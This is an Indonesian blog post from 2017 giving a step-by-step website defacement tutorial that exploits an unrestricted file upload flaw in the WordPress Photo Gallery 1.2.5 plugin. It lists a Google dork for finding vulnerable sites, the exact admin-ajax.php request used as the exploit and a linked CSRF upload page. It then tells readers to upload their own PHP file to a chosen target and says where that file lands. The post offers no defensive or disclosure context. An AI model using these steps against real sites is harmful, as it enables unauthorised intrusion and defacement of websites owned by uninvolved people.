Wednesday, 28 June 2017

WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload

Hai semuanya, kali ini gw mau share tutorial deface dengan WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload, oke langsung simak aja tutorialnya dibawah.
  • Google Dork : inurl:"/wp-content/plugins/photo-gallery/"
  • Exploit : /wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/
  • CSRF : https://pastebin.com/pLWYQ3v0
  • Yang pertama kalian cari target pake dork diatas, lalu masukin exploit. Jika vuln maka akan seperti ini.
  •  Kalian download csrf diatas dan simpan dengan ekstensi.html. Edit pada bagian target, dan ganti dengan target kalian.
  •  Lalu buka csrf nya dan upload file kalian.
  •  Jika sukses akan seperti ini.
  •  Lokasi file kalian di target.com/wp-admin/rce/file_kalian.php

Oke sekian dulu tutorial hari ini, terimakasih sudah berkunjung :)

0 comments:

Post a Comment